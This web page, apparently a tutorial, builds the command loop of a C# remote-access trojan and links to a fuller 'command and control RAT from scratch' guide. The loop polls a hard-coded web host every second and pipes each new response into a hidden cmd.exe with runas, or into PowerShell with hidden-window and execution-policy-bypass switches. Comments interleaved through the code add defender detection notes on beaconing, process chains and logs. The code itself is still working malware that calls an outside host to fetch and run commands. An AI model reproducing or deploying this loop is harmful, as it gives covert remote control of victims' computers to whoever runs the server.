NOTE: To understand a full command and control RAT from scratch, click here
This fetches the command from an online web server.
// Downloads the response body of a hard-coded HTTPS URL as a string. In this snippet the
// returned string is discarded; the combined loop later on the page assigns it to `json`.
// Nothing visible here authenticates or integrity-checks the response, so whoever controls
// that URL controls the text that is later executed.
// Defender note: the fixed host name and path are usable as network indicators in
// proxy / DNS / TLS-SNI logs.
new WebClient().DownloadString("https://ustaad-mailer.000webhostapp.com/go.php");<br>
Run the command on the device.
// Starts cmd.exe without a window and with stdin/stdout redirected, then writes the
// contents of `json` to the shell's standard input so that the shell executes that text.
// `json` is not defined in this snippet; in the combined loop later on the page it holds
// the web server's response, i.e. remotely supplied text is run with no validation.
// Defender note: a windowless cmd.exe started by an unfamiliar parent binary and then
// spawning children shows up in process-creation telemetry (for example Windows Security
// event 4688 or Sysmon event ID 1); the parent/child chain is the thing to alert on.
Process cmd = new Process();<br>
cmd.StartInfo.FileName = "cmd.exe";<br>
cmd.StartInfo.RedirectStandardInput = true;<br>
cmd.StartInfo.RedirectStandardOutput = true;<br>
cmd.StartInfo.CreateNoWindow = true;<br>
cmd.StartInfo.UseShellExecute = false;<br>
cmd.StartInfo.Verb = "runas";<br>
cmd.Start();<br>
cmd.StandardInput.WriteLine(json);<br>
<br><br><br>
Let's wait for 1 second
Thread.Sleep(1000);
Now let's combine the whole idea: get the command and run cmd in a while loop
// Polling loop: repeats for as long as chk == 0. `chk`, `json` and `oldjson` are declared
// outside this excerpt, and nothing in the loop as shown changes `chk`.
//
// Each pass downloads text from a fixed URL and, when it differs from the previous
// response, hands it to a shell. No authentication, signature or allow-list check on the
// response is visible, so the remote endpoint fully decides what runs on the host.
//
// Defender notes (what this pattern leaves behind):
//   - Network: a request to the same host and path roughly once per second; that regular
//     cadence is a beaconing pattern visible in proxy, DNS and TLS-SNI logs.
//   - Process: cmd.exe (and, in one branch, powershell.exe) started by this binary; see
//     the per-branch comments below.
while (chk == 0)
{
try
{
// Fetch the current response body from the hard-coded URL.
json = new WebClient().DownloadString("https://ustaad-mailer.000webhostapp.com/go.php");
// Act only when the response text changed since the previous poll.
if (json != oldjson)
{
// Branch chosen by a plain substring test on the remote text.
if (json.Contains("curl.exe"))
{
// The remote text is concatenated unescaped into a cmd.exe /C command line that starts
// PowerShell with "-w h" (hidden window) and "-ep bypass" (execution-policy bypass).
// Defender note: the whole string appears in process command-line logging; cmd.exe
// spawning powershell.exe with these two switches is a common detection signal, and
// PowerShell script-block logging records what is then executed.
System.Diagnostics.Process.Start("CMD.exe", "/C powershell -w h -ep bypass " + json);
}
else
{
// Start a windowless cmd.exe with redirected stdin/stdout and feed it the remote text
// on standard input. The redirected output is not read anywhere in the code shown.
// Defender note: here the text reaches the shell through stdin, so it is not part of
// this cmd.exe's own command line; monitor the child processes this cmd.exe creates and
// the unusual parent of the shell.
Process cmd = new Process();
cmd.StartInfo.FileName = "cmd.exe";
cmd.StartInfo.RedirectStandardInput = true;
cmd.StartInfo.RedirectStandardOutput = true;
cmd.StartInfo.CreateNoWindow = true;
cmd.StartInfo.UseShellExecute = false;
cmd.StartInfo.Verb = "runas";
cmd.Start();
cmd.StandardInput.WriteLine(json);
}
// Debug trace of the new and previous responses.
Console.WriteLine("diff result json=" + json + "old=" + oldjson);
}
else
{
// Response unchanged: nothing is executed, only a trace line is printed.
Console.WriteLine("same result json=" + json + "old=" + oldjson);
}
// Remember this response so that the next poll can detect a change.
oldjson = json;
}
// Every exception raised in the try block (download or process start) is reported with
// the same message; the exception object `e` itself is not used.
catch (Exception e)
{
Console.WriteLine("Connection not stable.");
}
// Wait 1000 ms before the next poll; this sets the request cadence noted above.
Thread.Sleep(1000);
}